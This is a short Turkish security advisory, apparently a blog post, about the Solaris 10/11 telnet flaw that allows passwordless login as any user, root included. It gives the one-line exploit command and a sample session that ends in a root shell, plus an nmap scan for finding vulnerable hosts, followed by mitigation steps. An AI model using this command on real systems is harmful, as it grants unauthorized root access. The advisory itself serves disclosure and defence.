Dün yayınlanan[1] ve sadece Sun Solaris 10, Solaris 11 işletim sistemlerini etkileyen güvenlik açığı telnet servisine herhangi bir sistem kullanıcısının parolasız bağlanabilmesini sağlıyor. Eğer root kullanıcısının telnet erişim yetkisi varsa bu, parolayı bilmeden sisteme tam yetkili erişilmesi manasına geliyor. Benzer bir açık[2] 1994 yılında bazı UNIX sistemlerinde de görülmüştü.
Güvenlik açığını nasıl test edersiniz?
$telnet -l -fkullanici_adi hedef_sistem
fbsd~$ telnet -l -froot 10.1.1.1
Trying 10.1.1.1…
Connected to 10.1.1.1.
Escape character is ‘^]’.
[ Trying mutual KERBEROS5 (host/[email protected])… ]
Kerberos V5: mk_req failed (No such file or directory)
[ Trying KERBEROS5 (host/[email protected])… ]
Kerberos V5: mk_req failed (No such file or directory)
Last login: Mon Feb 12 15:20:12 on console
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
Sourcing //.profile-EIS…..
root@solaris-test #
Ek olarak ağınızdaki Solaris Telnet sunucuları bulmak için Nmap[3] kullanabilirsiniz.
#nmap -sV -p23 ağ_bloğunuz -oG solaris_telnet|grep “Sun Solaris”
Korunma Yolları
1)Solaris sistemden telnet servisi kapatılıp yerine daha güvenli erişim yöntemi olan SSH tercih edilebilir.
Telneti kapatmak için
solaris-test# svcadm disable telnet
2)Telnet servisi açık kalması gerekiyorsa öncelikle sisteme root kullanıcısının erişimi kısıtlanmalı. Bu en azından sisteme en yetkili hesapla bağlanılmasını engeller fakat sistemdeki diğer kullanıcıların(sys,adm, lp vs)sisteme parolasız erişimi hala mümkün olmaktadır.
Adım Adım telnet ile sisteme root erişimini engellemek
/etc/default/login dosyasi acilir.
#CONSOLE=/dev/console satırı bulunur ve başındaki # karekteri kaldırılır.
3)Telnet servisine yapılan erişimler Ip tabanlı kısıtlanabilir. Bunun için Solaris’de tcp_wrapper ve IPF kullanılabilir. Telnet servisi için tcp_wrapper desteğini aktif ederek telnet servisine yapılan erişimler ip/network tabanlı kısıtlamak için,
Telnet servisine için tcp_wrapper desteği verilir
#inetadm -m telnet tcp_wrappers=TRUE
ve /etc/hosts.allow, /etc/hosts.deny dosyaları kullanılarak belirli IP/Aglara erişim tanımlanır.
[1] www.securityfocus.com
[2] www.osvdb.org
[3] www.insecure.org
Kaynak : 